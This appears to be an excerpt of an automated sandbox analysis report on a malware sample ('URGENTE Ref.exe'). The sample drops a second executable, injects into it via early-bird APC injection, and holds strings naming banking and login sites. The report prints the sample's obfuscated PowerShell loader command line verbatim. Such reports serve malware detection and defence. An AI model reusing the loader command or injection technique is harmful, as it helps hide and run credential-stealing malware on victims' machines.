          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -596491s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -596368s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -596219s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -596094s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -595985s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -595860s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -595735s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -595610s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -595485s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -595360s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -595235s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -595110s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -594985s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -594860s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -594735s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -594610s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -594485s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -594360s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -594235s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -594110s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -593985s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\URGENTE Ref.exeCode function: 0_2_00406167 FindFirstFileA,FindClose,0_2_00406167
          Source: C:\Users\user\Desktop\URGENTE Ref.exeCode function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405705
          Source: C:\Users\user\Desktop\URGENTE Ref.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_00406167 FindFirstFileA,FindClose,10_2_00406167
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,10_2_00405705
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_00402688 FindFirstFileA,10_2_00402688
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 599647Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 599532Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 599407Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 599282Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 599157Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 599032Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 598922Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 598813Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 598688Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 598563Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 598438Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 598313Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 598203Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 598094Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 597969Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 597860Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 597735Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 597610Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 597485Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 597360Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 597235Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 597110Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 596985Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 596860Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 596735Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 596610Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 596491Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 596368Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 596219Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 596094Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 595985Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 595860Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 595735Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 595610Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 595485Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 595360Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 595235Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 595110Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594985Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594860Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594735Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594610Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594485Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594360Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594235Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594110Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 593985Jump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
          Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
          Source: Undismembered.exe, 0000000A.00000002.2478474026.0000000004038000.00000004.00000020.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2478474026.0000000004091000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
          Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
          Source: powershell.exe, 00000002.00000002.1601132582.0000000005346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
          Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000002.00000002.1601132582.0000000005346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
          Source: powershell.exe, 00000002.00000002.1601132582.0000000005346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
          Source: C:\Users\user\Desktop\URGENTE Ref.exeAPI call chain: ExitProcess graph end nodegraph_0-3612
          Source: C:\Users\user\Desktop\URGENTE Ref.exeAPI call chain: ExitProcess graph end nodegraph_0-3768
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Early bird code injection technique detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Undismembered.exeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Undismembered.exeJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Undismembered.exe base: 16C0000Jump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Unsexual24=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Theopneustic\Portentousness.Unm177';$Authorize=$Unsexual24.SubString(53440,3);.$Authorize($Unsexual24)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Undismembered.exe "C:\Users\user\AppData\Local\Temp\Undismembered.exe"Jump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeCode function: 0_2_100010D3 GetModuleFileNameA,GlobalAlloc,CharPrevA,GlobalFree,GetTempFileNameA,CopyFileA,CreateFileA,CreateFileMappingA,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,lstrcatA,lstrlenA,GlobalAlloc,FindWindowExA,FindWindowExA,FindWindowExA,lstrcmpiA,DeleteFileA,GetVersion,GlobalAlloc,GlobalLock,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoA,CreateProcessA,lstrcpyA,GetTickCount,PeekNamedPipe,GetTickCount,ReadFile,lstrlenA,lstrlenA,lstrlenA,lstrcpynA,lstrlenA,GlobalSize,GlobalUnlock,GlobalReAlloc,GlobalLock,lstrcatA,GlobalSize,lstrlenA,lstrcpyA,CharNextA,GetTickCount,TerminateProcess,lstrcpyA,Sleep,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,lstrcpyA,lstrcpyA,wsprintfA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileA,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,0_2_100010D3
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
